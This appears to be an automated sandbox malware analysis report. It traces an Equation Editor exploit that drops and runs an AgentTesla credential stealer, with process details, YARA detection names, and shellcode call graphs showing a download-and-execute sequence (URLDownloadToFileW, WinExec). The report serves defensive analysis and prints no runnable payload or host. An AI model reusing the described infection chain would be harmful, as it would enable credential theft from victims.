                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase:0x400000
                          File size:543'304 bytes
                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:11:54:41
                          Start date:13/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          Imagebase:0x3c0000
                          File size:1'051'136 bytes
                          MD5 hash:EF05B0557B2C8F0C951A1B21B812E75F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 74%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:6
                          Start time:11:54:42
                          Start date:13/12/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          Imagebase:0xa50000
                          File size:45'248 bytes
                          MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.620861905.00000000021A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:17.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:80.6%
                            Total number of Nodes:72
                            Total number of Limit Nodes:4
                            execution_graph 299 36a05ef GetPEB 300 36a05fd 299->300 301 36a04ed 302 36a04ef 301->302 305 36a0502 LoadLibraryW 302->305 306 36a0509 305->306 316 36a051c 305->316 326 36a057d URLDownloadToFileW 306->326 309 36a052d URLDownloadToFileW 332 36a059a 309->332 317 36a051f 316->317 318 36a057d 4 API calls 317->318 319 36a052d URLDownloadToFileW 317->319 318->319 321 36a059a 3 API calls 319->321 323 36a0586 321->323 322 36a05fd 322->306 323->322 336 36a05c8 323->336 327 36a0586 326->327 328 36a059a 3 API calls 326->328 329 36a05fd 327->329 330 36a05c8 3 API calls 327->330 328->327 329->309 331 36a05c0 330->331 333 36a059d 332->333 334 36a05c8 3 API calls 333->334 335 36a05c0 334->335 337 36a05cb WinExec 336->337 342 36a05e8 337->342 339 36a05dc 340 36a05c0 339->340 341 36a05eb ExitProcess 339->341 343 36a05eb ExitProcess 342->343 344 36a0453 ExitProcess 361 36a046c 344->361 346 36a04c1 347 36a045f 347->346 379 36a04af 347->379 362 36a0472 361->362 383 36a0488 362->383 364 36a04c1 365 36a0479 365->364 366 36a04af 7 API calls 365->366 367 36a0495 366->367 368 36a0508 367->368 370 36a04a1 367->370 369 36a057d 4 API calls 368->369 372 36a052d URLDownloadToFileW 369->372 399 36a04ed 370->399 374 36a059a 3 API calls 372->374 375 36a0586 374->375 376 36a05fd 375->376 377 36a05c8 3 API calls 375->377 376->347 378 36a05c0 377->378 380 36a04b2 379->380 381 36a04ed 7 API calls 380->381 382 36a04c1 381->382 384 36a048e 383->384 385 36a0495 384->385 386 36a04af 7 API calls 384->386 387 36a0508 385->387 389 36a04a1 385->389 386->385 388 36a057d 4 API calls 387->388 391 36a052d URLDownloadToFileW 388->391 390 36a04ed 7 API calls 389->390 394 36a04c1 390->394 393 36a059a 3 API calls 391->393 395 36a0586 393->395 396 36a05fd 395->396 397 36a05c8 3 API calls 395->397 396->365 398 36a05c0 397->398 400 36a04ef 399->400 401 36a0502 7 API calls 400->401 402 36a04f4 401->402

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_036A002A 1 Function_036A0668 2 Function_036A05E8 3 Function_036A0129 4 Function_036A05EF 24 Function_036A0617 4->24 5 Function_036A022F 6 Function_036A04AF 8 Function_036A04ED 6->8 7 Function_036A046C 7->1 7->6 7->8 10 Function_036A057D 7->10 12 Function_036A05C8 7->12 13 Function_036A0488 7->13 19 Function_036A059A 7->19 7->24 14 Function_036A0502 8->14 9 Function_036A017A 10->12 10->19 10->24 11 Function_036A0177 12->2 13->1 13->6 13->8 13->10 13->12 13->19 13->24 14->10 14->12 14->19 21 Function_036A051C 14->21 14->24 15 Function_036A0200 16 Function_036A0300 17 Function_036A0146 18 Function_036A00C5 19->12 20 Function_036A03DE 21->10 21->12 21->19 21->24 22 Function_036A01DD 23 Function_036A0453 23->6 23->7 23->8 23->10 23->12 23->19 23->24

                            Executed Functions

                            Function 036A0502 Relevance: 3.1, APIs: 2, Instructions: 82libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • LoadLibraryW.KERNEL32(036A04F4), ref: 036A0502
                              • Part of subcall function 036A051C: URLDownloadToFileW.URLMON(00000000,036A052D,?,00000000,00000000), ref: 036A057F
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFileLibraryLoad
                            • String ID:
                            • API String ID: 2776762486-0
                            • Opcode ID: e94b88cf9481e6908cd166b5b753c719fa523c71398657b79e25824b5e70da51
                            • Instruction ID: 473273bf81c33d49448aed5974af6bdc2393bf967255b9ca560e43eaa79cc787
                            • Opcode Fuzzy Hash: e94b88cf9481e6908cd166b5b753c719fa523c71398657b79e25824b5e70da51
                            • Instruction Fuzzy Hash: 6721F4E084CBC12FC712D7740F7AB55BF246B53610F1CCA8EE595091D3A3909A059F66
                            Function 036A05C8 Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 27 36a05c8-36a05df WinExec call 36a05e8 32 36a0631 27->32 33 36a05e1 27->33 36 36a0639-36a063d 32->36 37 36a0633-36a0637 32->37 34 36a0652-36a0654 33->34 35 36a05e3-36a05ed ExitProcess 33->35 41 36a0664-36a0665 34->41 36->34 40 36a063f-36a0643 36->40 37->36 39 36a0645-36a064c 37->39 42 36a064e 39->42 43 36a0650 39->43 40->34 40->39 42->34 43->34 44 36a0656-36a065f 43->44 44->41 46 36a0623-36a0626 44->46 47 36a0628-36a062b 46->47 48 36a0661 46->48 47->44 49 36a062d 47->49 48->41 49->32
                            APIs
                            • WinExec.KERNEL32(?,00000001), ref: 036A05D5
                              • Part of subcall function 036A05E8: ExitProcess.KERNELBASE(00000000), ref: 036A05ED
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExecExitProcess
                            • String ID:
                            • API String ID: 4112423671-0
                            • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                            • Instruction ID: 14452f3e3fe89a181e45c73f317f8c36e69b37402367c33369ddd9d9931b1ce0
                            • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                            • Instruction Fuzzy Hash: 0BF0F95D904B4311CB74E62C45647BAEB51DBD2208FCCB857949504147D168EDE38E5A
                            Function 036A046C Relevance: 1.6, APIs: 1, Instructions: 145filenetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • URLDownloadToFileW.URLMON(00000000,036A052D,?,00000000,00000000), ref: 036A057F
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: 573488d0e6a54ab078a07acce31223b24c8acf309325882d5dcd984982034f67
                            • Instruction ID: 84bf57df83f36f937546020fa9643adeed6398dbd7308fe1725bcbd457bd0ba5
                            • Opcode Fuzzy Hash: 573488d0e6a54ab078a07acce31223b24c8acf309325882d5dcd984982034f67
                            • Instruction Fuzzy Hash: 3441F3A084CBC06FC712D7784F6A696BF65BB03610F1CCACFD1D50E1A3D364AA059B66
                            Function 036A0488 Relevance: 1.6, APIs: 1, Instructions: 133filenetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 100 36a0488-36a048e call 36a0668 103 36a0495-36a0496 100->103 104 36a0490 call 36a04af 100->104 105 36a0508-36a050e 103->105 106 36a0498-36a049d 103->106 104->103 107 36a0510-36a0591 call 36a057d URLDownloadToFileW call 36a059a 105->107 106->105 108 36a049f 106->108 132 36a05ff-36a0607 call 36a0617 107->132 133 36a0593 107->133 108->107 109 36a04a1-36a0500 call 36a04ed 108->109 137 36a060c-36a060e 132->137 135 36a05fe 133->135 136 36a0595-36a0596 133->136 135->132 136->137 138 36a0598-36a05c1 call 36a05c8 136->138 139 36a05fd 137->139 140 36a0610-36a0614 137->140 139->132
                            APIs
                            • URLDownloadToFileW.URLMON(00000000,036A052D,?,00000000,00000000), ref: 036A057F
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: bd13d24030d9c2bde2db613ebd633f987f480b2185956e7d9d65a0eb92cfdb32
                            • Instruction ID: 00df4fe7c2d35efb5ad2c5319e146c0431979ad66e4cebd44409b95cdbe3d476
                            • Opcode Fuzzy Hash: bd13d24030d9c2bde2db613ebd633f987f480b2185956e7d9d65a0eb92cfdb32
                            • Instruction Fuzzy Hash: 0A4123A084CBC56FC312DB784F6A655BF647B43210F0CCACED1D50A1D3D3A49A059B66
                            Function 036A051C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 144 36a051c-36a0527 146 36a052d-36a0581 URLDownloadToFileW call 36a059a 144->146 147 36a0528 call 36a057d 144->147 156 36a0586-36a0591 146->156 147->146 157 36a05ff-36a0607 call 36a0617 156->157 158 36a0593 156->158 162 36a060c-36a060e 157->162 160 36a05fe 158->160 161 36a0595-36a0596 158->161 160->157 161->162 163 36a0598-36a05c1 call 36a05c8 161->163 164 36a05fd 162->164 165 36a0610-36a0614 162->165 164->157
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: be88e611c56496e43933ae3405814ab347067055421826d976b01dd4bed9f06f
                            • Instruction ID: e90e5b1659adcd5e00ad084a26b6d95caec33800c5892b21c6c93cf8b4960736
                            • Opcode Fuzzy Hash: be88e611c56496e43933ae3405814ab347067055421826d976b01dd4bed9f06f
                            • Instruction Fuzzy Hash: EF11B1E084CBC12FC722D7784E6AB55BF652B52610F1CCACEE1D50E1D3E3A49901DB66
                            Function 036A057D Relevance: 1.6, APIs: 1, Instructions: 58filenetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 169 36a057d-36a057f URLDownloadToFileW 170 36a0586-36a0591 169->170 171 36a0581 call 36a059a 169->171 172 36a05ff-36a0607 call 36a0617 170->172 173 36a0593 170->173 171->170 177 36a060c-36a060e 172->177 175 36a05fe 173->175 176 36a0595-36a0596 173->176 175->172 176->177 178 36a0598-36a05c1 call 36a05c8 176->178 179 36a05fd 177->179 180 36a0610-36a0614 177->180 179->172
                            APIs
                            • URLDownloadToFileW.URLMON(00000000,036A052D,?,00000000,00000000), ref: 036A057F
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                            • Instruction ID: 7220e37573c88029de044148ba803eece1546f22a17e39515dbf12e2ad31e95e
                            • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                            • Instruction Fuzzy Hash: 0D11AF7494474236D720E75C8E50FA6FB65AFD2714F48E45AE1500D1C6E2A0FCA7CE2A
                            Function 036A05E8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 184 36a05e8-36a05ed ExitProcess
                            APIs
                            • ExitProcess.KERNELBASE(00000000), ref: 036A05ED
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                            • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                            • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                            • Instruction Fuzzy Hash:
                            Function 036A05EF Relevance: .0, Instructions: 14COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 186 36a05ef-36a05fa GetPEB 187 36a05fd-36a060e call 36a0617 186->187 191 36a0610-36a0614 187->191
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                            • Instruction ID: 419dd8fe8ddac1a0c45732a32ac084936e79ab9387aeca12857a2fdec6a4cc50
                            • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                            • Instruction Fuzzy Hash: 51D05271202902CFC304DB08CA80E52F37AFFC8210B28C268E0004B719C330ECA2CEA4

                            Non-executed Functions

                            Function 036A0453 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 192 36a0453-36a047d ExitProcess call 36a046c 196 36a04ee-36a0500 192->196 197 36a047f-36a0496 call 36a04af 192->197 203 36a0508-36a050e 197->203 204 36a0498-36a049d 197->204 205 36a0510-36a0591 call 36a057d URLDownloadToFileW call 36a059a 203->205 204->203 206 36a049f 204->206 228 36a05ff-36a0607 call 36a0617 205->228 229 36a0593 205->229 206->205 207 36a04a1-36a04ec call 36a04ed 206->207 207->196 233 36a060c-36a060e 228->233 231 36a05fe 229->231 232 36a0595-36a0596 229->232 231->228 232->233 234 36a0598-36a05c1 call 36a05c8 232->234 235 36a05fd 233->235 236 36a0610-36a0614 233->236 235->228
                            APIs
                            • ExitProcess.KERNELBASE(036A0441), ref: 036A0453
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID: adLibraryW
                            • API String ID: 621844428-2769239626
                            • Opcode ID: c0aaf13b1b31a7b0a9387b2587052652d3a58759d93e7561a730e1ce5deefc4e
                            • Instruction ID: 3bf064668d42ddc82c87606eb206d9be561543be6e74e91cf17f32dadc8bef1a
                            • Opcode Fuzzy Hash: c0aaf13b1b31a7b0a9387b2587052652d3a58759d93e7561a730e1ce5deefc4e
                            • Instruction Fuzzy Hash: 8C11369580EFC09FC312EB385E69159BFA4BE13504B1C45CFC1C44E1A3E6649E06CB72

                            Execution Graph

                            Execution Coverage:4%
                            Dynamic/Decrypted Code Coverage:0.4%
                            Signature Coverage:2.9%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:62
                            execution_graph 100676 3c107d 100681 3c708b 100676->100681 100678 3c108c 100712 3e2d40 100678->100712 100682 3c709b __ftell_nolock 100681->100682 100715 3c7667 100682->100715 100686 3c715a 100727 3e050b 100686->100727 100693 3c7667 59 API calls 100694 3c718b 100693->100694 100746 3c7d8c 100694->100746 100696 3c7194 RegOpenKeyExW 100697 3fe8b1 RegQueryValueExW 100696->100697 100702 3c71b6 Mailbox 100696->100702 100698 3fe8ce 100697->100698 100699 3fe943 RegCloseKey 100697->100699 100750 3e0db6 100698->100750 100699->100702 100710 3fe955 _wcscat Mailbox __wsetenvp 100699->100710 100701 3fe8e7 100760 3c522e 100701->100760 100702->100678 100705 3fe90f 100763 3c7bcc 100705->100763 100707 3fe929 100707->100699 100709 3c3f74 59 API calls 100709->100710 100710->100702 100710->100709 100711 3c79f2 59 API calls 100710->100711 100772 3c7de1 100710->100772 100711->100710 100837 3e2c44 100712->100837 100714 3c1096 100716 3e0db6 Mailbox 59 API calls 100715->100716 100717 3c7688 100716->100717 100718 3e0db6 Mailbox 59 API calls 100717->100718 100719 3c7151 100718->100719 100720 3c4706 100719->100720 100776 3f1940 100720->100776 100723 3c7de1 59 API calls 100724 3c4739 100723->100724 100778 3c4750 100724->100778 100726 3c4743 Mailbox 100726->100686 100728 3f1940 __ftell_nolock 100727->100728 100729 3e0518 GetFullPathNameW 100728->100729 100730 3e053a 100729->100730 100731 3c7bcc 59 API calls 100730->100731 100732 3c7165 100731->100732 100733 3c7cab 100732->100733 100734 3c7cbf 100733->100734 100735 3fed4a 100733->100735 100800 3c7c50 100734->100800 100805 3c8029 100735->100805 100738 3fed55 __wsetenvp _memmove 100739 3c7173 100740 3c3f74 100739->100740 100741 3c3f82 100740->100741 100745 3c3fa4 _memmove 100740->100745 100743 3e0db6 Mailbox 59 API calls 100741->100743 100742 3e0db6 Mailbox 59 API calls 100744 3c3fb8 100742->100744 100743->100745 100744->100693 100745->100742 100747 3c7da6 100746->100747 100749 3c7d99 100746->100749 100748 3e0db6 Mailbox 59 API calls 100747->100748 100748->100749 100749->100696 100752 3e0dbe 100750->100752 100753 3e0dd8 100752->100753 100755 3e0ddc std::exception::exception 100752->100755 100808 3e571c 100752->100808 100825 3e33a1 DecodePointer 100752->100825 100753->100701 100826 3e859b RaiseException 100755->100826 100757 3e0e06 100827 3e84d1 58 API calls _free 100757->100827 100759 3e0e18 100759->100701 100761 3e0db6 Mailbox 59 API calls 100760->100761 100762 3c5240 RegQueryValueExW 100761->100762 100762->100705 100762->100707 100764 3c7bd8 __wsetenvp 100763->100764 100765 3c7c45 100763->100765 100767 3c7bee 100764->100767 100768 3c7c13 100764->100768 100766 3c7d2c 59 API calls 100765->100766 100771 3c7bf6 _memmove 100766->100771 100836 3c7f27 59 API calls Mailbox 100767->100836 100769 3c8029 59 API calls 100768->100769 100769->100771 100771->100707 100773 3c7df0 __wsetenvp _memmove 100772->100773 100774 3e0db6 Mailbox 59 API calls 100773->100774 100775 3c7e2e 100774->100775 100775->100710 100777 3c4713 GetModuleFileNameW 100776->100777 100777->100723 100779 3f1940 __ftell_nolock 100778->100779 100780 3c475d GetFullPathNameW 100779->100780 100781 3c477c 100780->100781 100782 3c4799 100780->100782 100784 3c7bcc 59 API calls 100781->100784 100783 3c7d8c 59 API calls 100782->100783 100785 3c4788 100783->100785 100784->100785 100788 3c7726 100785->100788 100789 3c7734 100788->100789 100792 3c7d2c 100789->100792 100791 3c4794 100791->100726 100793 3c7d3a 100792->100793 100795 3c7d43 _memmove 100792->100795 100793->100795 100796 3c7e4f 100793->100796 100795->100791 100797 3c7e62 100796->100797 100799 3c7e5f _memmove 100796->100799 100798 3e0db6 Mailbox 59 API calls 100797->100798 100798->100799 100799->100795 100801 3c7c5f __wsetenvp 100800->100801 100802 3c8029 59 API calls 100801->100802 100803 3c7c70 _memmove 100801->100803 100804 3fed07 _memmove 100802->100804 100803->100739 100806 3e0db6 Mailbox 59 API calls 100805->100806 100807 3c8033 100806->100807 100807->100738 100809 3e5797 100808->100809 100813 3e5728 100808->100813 100834 3e33a1 DecodePointer 100809->100834 100811 3e579d 100835 3e8b28 58 API calls __getptd_noexit 100811->100835 100812 3e5733 100812->100813 100828 3ea16b 58 API calls 2 library calls 100812->100828 100829 3ea1c8 58 API calls 8 library calls 100812->100829 100830 3e309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100812->100830 100813->100812 100816 3e575b RtlAllocateHeap 100813->100816 100819 3e5783 100813->100819 100823 3e5781 100813->100823 100831 3e33a1 DecodePointer 100813->100831 100816->100813 100817 3e578f 100816->100817 100817->100752 100832 3e8b28 58 API calls __getptd_noexit 100819->100832 100833 3e8b28 58 API calls __getptd_noexit 100823->100833 100825->100752 100826->100757 100827->100759 100828->100812 100829->100812 100831->100813 100832->100823 100833->100817 100834->100811 100835->100817 100836->100771 100838 3e2c50 __setmbcp 100837->100838 100845 3e3217 100838->100845 100844 3e2c77 __setmbcp 100844->100714 100862 3e9c0b 100845->100862 100847 3e2c59 100848 3e2c88 RtlDecodePointer DecodePointer 100847->100848 100849 3e2c65 100848->100849 100850 3e2cb5 100848->100850 100859 3e2c82 100849->100859 100850->100849 100908 3e87a4 59 API calls 2 library calls 100850->100908 100852 3e2d18 EncodePointer EncodePointer 100852->100849 100853 3e2cc7 100853->100852 100854 3e2cec 100853->100854 100909 3e8864 61 API calls __realloc_crt 100853->100909 100854->100849 100857 3e2d06 EncodePointer 100854->100857 100910 3e8864 61 API calls __realloc_crt 100854->100910 100857->100852 100858 3e2d00 100858->100849 100858->100857 100911 3e3220 100859->100911 100863 3e9c2f EnterCriticalSection 100862->100863 100864 3e9c1c 100862->100864 100863->100847 100869 3e9c93 100864->100869 100866 3e9c22 100866->100863 100893 3e30b5 58 API calls 3 library calls 100866->100893 100870 3e9c9f __setmbcp 100869->100870 100871 3e9ca8 100870->100871 100872 3e9cc0 100870->100872 100894 3ea16b 58 API calls 2 library calls 100871->100894 100884 3e9ce1 __setmbcp 100872->100884 100897 3e881d 58 API calls 2 library calls 100872->100897 100875 3e9cad 100895 3ea1c8 58 API calls 8 library calls 100875->100895 100876 3e9cd5 100878 3e9cdc 100876->100878 100879 3e9ceb 100876->100879 100898 3e8b28 58 API calls __getptd_noexit 100878->100898 100882 3e9c0b __lock 58 API calls 100879->100882 100880 3e9cb4 100896 3e309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100880->100896 100885 3e9cf2 100882->100885 100884->100866 100887 3e9cff 100885->100887 100888 3e9d17 100885->100888 100899 3e9e2b InitializeCriticalSectionAndSpinCount 100887->100899 100900 3e2d55 100888->100900 100891 3e9d0b 100906 3e9d33 LeaveCriticalSection _doexit 100891->100906 100894->100875 100895->100880 100897->100876 100898->100884 100899->100891 100901 3e2d5e HeapFree 100900->100901 100902 3e2d87 __dosmaperr 100900->100902 100901->100902 100903 3e2d73 100901->100903 100902->100891 100907 3e8b28 58 API calls __getptd_noexit 100903->100907 100905 3e2d79 GetLastError 100905->100902 100906->100884 100907->100905 100908->100853 100909->100854 100910->100858 100914 3e9d75 LeaveCriticalSection 100911->100914 100913 3e2c87 100913->100844 100914->100913 100915 e93a48 100929 e91698 100915->100929 100917 e93afa 100932 e93938 100917->100932 100935 e94b28 GetPEB 100929->100935 100931 e91d23 100931->100917 100933 e93941 Sleep 100932->100933 100934 e9394f 100933->100934 100936 e94b52 100935->100936 100936->100931 100937 3ffdfc 100970 3cab30 Mailbox _memmove 100937->100970 100939 41617e Mailbox 59 API calls 100964 3ca057 100939->100964 100941 3e0db6 59 API calls Mailbox 100941->100970 100944 3cb525 101194 429e4a 89 API calls 4 library calls 100944->101194 100945 400055 101189 429e4a 89 API calls 4 library calls 100945->101189 100949 3cb475 101190 3c8047 100949->101190 100950 3e0db6 59 API calls Mailbox 100966 3c9f37 Mailbox 100950->100966 100951 3c8047 59 API calls 100951->100966 100952 400064 100956 3cb47a 100956->100945 100965 4009e5 100956->100965 100958 3c7667 59 API calls 100958->100966 100959 416e8f 59 API calls 100959->100966 100960 3e2d40 67 API calls __cinit 100960->100966 100961 3c7de1 59 API calls 100961->100970 100962 4009d6 101198 429e4a 89 API calls 4 library calls 100962->101198 101199 429e4a 89 API calls 4 library calls 100965->101199 100966->100945 100966->100949 100966->100950 100966->100951 100966->100956 100966->100958 100966->100959 100966->100960 100966->100962 100966->100964 100967 3ca55a 100966->100967 101182 3cc8c0 341 API calls 2 library calls 100966->101182 101183 3cb900 60 API calls Mailbox 100966->101183 101197 429e4a 89 API calls 4 library calls 100967->101197 100970->100941 100970->100944 100970->100961 100970->100964 100970->100966 100971 3cb2b6 100970->100971 100974 40086a 100970->100974 100976 400878 100970->100976 100978 40085c 100970->100978 100979 3cb21c 100970->100979 100982 416e8f 59 API calls 100970->100982 100987 3c9ea0 100970->100987 101011 42d07b 100970->101011 101058 43df23 100970->101058 101061 3d1fc3 100970->101061 101101 43c2e0 100970->101101 101133 427956 100970->101133 101139 43bc6b 100970->101139 101179 41617e 100970->101179 101184 3c9c90 59 API calls Mailbox 100970->101184 101188 43c193 85 API calls 2 library calls 100970->101188 101187 3cf6a3 341 API calls 100971->101187 101195 3c9c90 59 API calls Mailbox 100974->101195 101196 429e4a 89 API calls 4 library calls 100976->101196 100978->100939 100978->100964 101185 3c9d3c 60 API calls Mailbox 100979->101185 100981 3cb22d 101186 3c9d3c 60 API calls Mailbox 100981->101186 100982->100970 100988 3c9ebf 100987->100988 101006 3c9eed Mailbox 100987->101006 100989 3e0db6 Mailbox 59 API calls 100988->100989 100989->101006 100990 3e2d40 67 API calls __cinit 100990->101006 100991 3cb475 100992 3c8047 59 API calls 100991->100992 101004 3ca057 100992->101004 100993 3cb47a 100995 400055 100993->100995 101010 4009e5 100993->101010 100994 3e0db6 59 API calls Mailbox 100994->101006 101202 429e4a 89 API calls 4 library calls 100995->101202 100999 400064 100999->100970 101001 3c8047 59 API calls 101001->101006 101003 3c7667 59 API calls 101003->101006 101004->100970 101005 416e8f 59 API calls 101005->101006 101006->100990 101006->100991 101006->100993 101006->100994 101006->100995 101006->101001 101006->101003 101006->101004 101006->101005 101007 4009d6 101006->101007 101009 3ca55a 101006->101009 101200 3cc8c0 341 API calls 2 library calls 101006->101200 101201 3cb900 60 API calls Mailbox 101006->101201 101204 429e4a 89 API calls 4 library calls 101007->101204 101203 429e4a 89 API calls 4 library calls 101009->101203 101205 429e4a 89 API calls 4 library calls 101010->101205 101012 42d09a 101011->101012 101013 42d0a5 101011->101013 101237 3c9b3c 59 API calls 101012->101237 101017 3c7667 59 API calls 101013->101017 101056 42d17f Mailbox 101013->101056 101015 3e0db6 Mailbox 59 API calls 101016 42d1c8 101015->101016 101018 42d1d4 101016->101018 101303 3c57a6 60 API calls Mailbox 101016->101303 101019 42d0c9 101017->101019 101206 3c9837 101018->101206 101021 3c7667 59 API calls 101019->101021 101023 42d0d2 101021->101023 101025 3c9837 84 API calls 101023->101025 101026 42d0de 101025->101026 101238 3c459b 101026->101238 101030 42d233 101036 42d295 101030->101036 101037 42d25e 101030->101037 101031 42d1ff GetLastError 101033 42d218 101031->101033 101032 42d0f3 101289 3c7b2e 101032->101289 101054 42d188 Mailbox 101033->101054 101304 3c58ba CloseHandle 101033->101304 